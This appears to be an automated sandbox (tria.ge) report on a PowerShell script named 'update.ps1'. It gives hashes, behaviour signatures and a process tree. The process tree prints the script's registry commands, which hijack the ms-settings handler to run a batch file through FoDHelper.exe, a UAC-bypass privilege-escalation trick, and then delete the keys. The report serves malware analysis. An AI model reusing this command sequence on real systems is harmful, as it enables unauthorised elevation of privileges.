Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    25/03/2025, 21:19

General

  • Target

    update.ps1

  • Size

    49KB

  • MD5

    7939a13a1cfe5e697d4db5eac4a63ecf

  • SHA1

    334411a10172046f3f71c444502ffe42e3e8af61

  • SHA256

    9ac86db17423b057b502f64005f6f6f3ecafcac65f3d9099dad6a79908bd7bf1

  • SHA512

    294a4afb4878e01c14732de30e4827b9cef695dfab0fbe7f80b2b16bf6adf1a76f198092dd579bde8101248b1d0fc5e16daa68adee929dc624f2c71cda5c121f

  • SSDEEP

    1536:R5MXBuH/FWb8dnhLBh0RqW9KbApkRCqUh+TqG305b+:cBK/FfpFByRJ8CPh+T30l+

Score
3/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Modifies registry class 28 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\update.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2688
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2932
      • C:\Windows\system32\reg.exe
        REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\Admin\AppData\Local\Temp\r.bat" /F
        3⤵
        • Modifies registry class
        PID:2708
      • C:\Windows\system32\reg.exe
        REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
        3⤵
        • Modifies registry class
        PID:2744
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1864
      • C:\Windows\system32\reg.exe
        REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
        3⤵
        • Modifies registry class
        PID:2856
      • C:\Windows\system32\reg.exe
        REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
        3⤵
        • Modifies registry class
        PID:2824
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1888
      • C:\Windows\system32\reg.exe
        REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\Admin\AppData\Local\Temp\r.bat" /F
        3⤵
        • Modifies registry class
        PID:2720
      • C:\Windows\system32\reg.exe
        REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
        3⤵
        • Modifies registry class
        PID:2684
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1992
      • C:\Windows\system32\reg.exe
        REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
        3⤵
        • Modifies registry class
        PID:2592
      • C:\Windows\system32\reg.exe
        REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
        3⤵
        • Modifies registry class
        PID:2740

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2688-4-0x000007FEF642E000-0x000007FEF642F000-memory.dmp

    Filesize

    4KB

  • memory/2688-5-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

    Filesize

    2.9MB

  • memory/2688-6-0x0000000002820000-0x0000000002828000-memory.dmp

    Filesize

    32KB

  • memory/2688-7-0x000007FEF6170000-0x000007FEF6B0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2688-8-0x000007FEF6170000-0x000007FEF6B0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2688-9-0x000007FEF6170000-0x000007FEF6B0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2688-10-0x000007FEF6170000-0x000007FEF6B0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2688-11-0x000007FEF6170000-0x000007FEF6B0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2688-12-0x000007FEF6170000-0x000007FEF6B0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2688-16-0x000007FEF6170000-0x000007FEF6B0D000-memory.dmp

    Filesize

    9.6MB